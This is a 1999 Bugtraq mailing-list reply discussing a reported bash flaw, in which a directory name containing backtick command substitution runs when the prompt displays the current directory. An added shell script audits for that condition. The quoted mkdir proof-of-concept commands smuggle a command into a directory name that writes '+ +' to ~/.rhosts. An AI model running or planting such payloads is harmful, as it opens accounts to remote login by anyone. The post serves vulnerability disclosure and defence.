Bugtraq mailing list archives
Re: Bash Bug
From: pcg () GOOF COM (Marc Lehmann)
Date: Thu, 22 Apr 1999 03:18:48 +0200
On Tue, Apr 20, 1999 at 09:25:47PM -0400, Shadow wrote:
> If a user creates a directory with a command like mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
It seems to me that this is related to the prompt string parsing. If yes, then bash is not vulnerable unless configured to display the current directory (correct me if the root of the problem is different).

Some additional notes:

- I was unable to reproduce this on my system, even when bash is configured to display the current path in the prompt. (bash 2.02.1(1))
- The original example seemed to have too much whitespace. I used:

      mkdir "\`echo -e \"echo + +> ~\57.rhosts\" > x; source x; rm -f \x\`"

- PS1 was set to \h:\w\$

HTH

--
      -----==-                                             |
      ----==-- _                                           |
      ---==---(_)__  __ ____  __       Marc Lehmann      +--
      --==---/ / _ \/ // /\ \/ /       pcg () goof com   |e|
      -=====/_/_//_/\_,_/ /_/\_\       XX11-RIPE         --+
    The choice of a GNU generation                       |
                                                         |
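The reply above ties the issue to two conditions: a prompt that displays the current directory, and a directory name containing command-substitution characters. The following audit script is an added example, not part of the original post; the function names are hypothetical, and flagging `$(` alongside the backtick goes beyond the one case the thread shows. It only reports the precondition and does not determine whether a given bash version evaluates such names.

```shell
#!/bin/sh
# Added example (not from the original post): report whether a prompt string
# displays the working directory, and find directory names that contain
# command-substitution characters (backtick or "$(").

# Prompt string quoted in the post, used as the default when none is given.
PAGE_PS1='\h:\w\$'

# prompt_shows_cwd PS1_STRING -> status 0 if the string contains \w or \W
prompt_shows_cwd() {
    case $1 in
        *'\w'*|*'\W'*) return 0 ;;
        *) return 1 ;;
    esac
}

# list_suspicious_dirs ROOT -> print matching directories, one per line
list_suspicious_dirs() {
    find "$1" -type d \( -name '*`*' -o -name '*$(*' \) -print 2>/dev/null || true
}

# count_suspicious_dirs ROOT -> print the number of matching directories
# (counts one byte per match, so newlines inside names cannot skew it)
count_suspicious_dirs() {
    find "$1" -type d \( -name '*`*' -o -name '*$(*' \) \
        -exec printf x \; 2>/dev/null | wc -c | tr -d ' '
}

# audit_tree ROOT PS1_STRING -> print a short report; always returns 0
audit_tree() {
    if prompt_shows_cwd "$2"; then shown=yes; else shown=no; fi
    echo "prompt displays current directory: $shown"
    echo "suspicious directory names under $1: $(count_suspicious_dirs "$1")"
    list_suspicious_dirs "$1"
    return 0
}

# Usage: script [ROOT] [PS1_STRING]
audit_tree "${1:-.}" "${2:-$PAGE_PS1}"
```

Because PS1 is normally unset in a non-interactive script, pass the prompt string of the account being checked as the second argument.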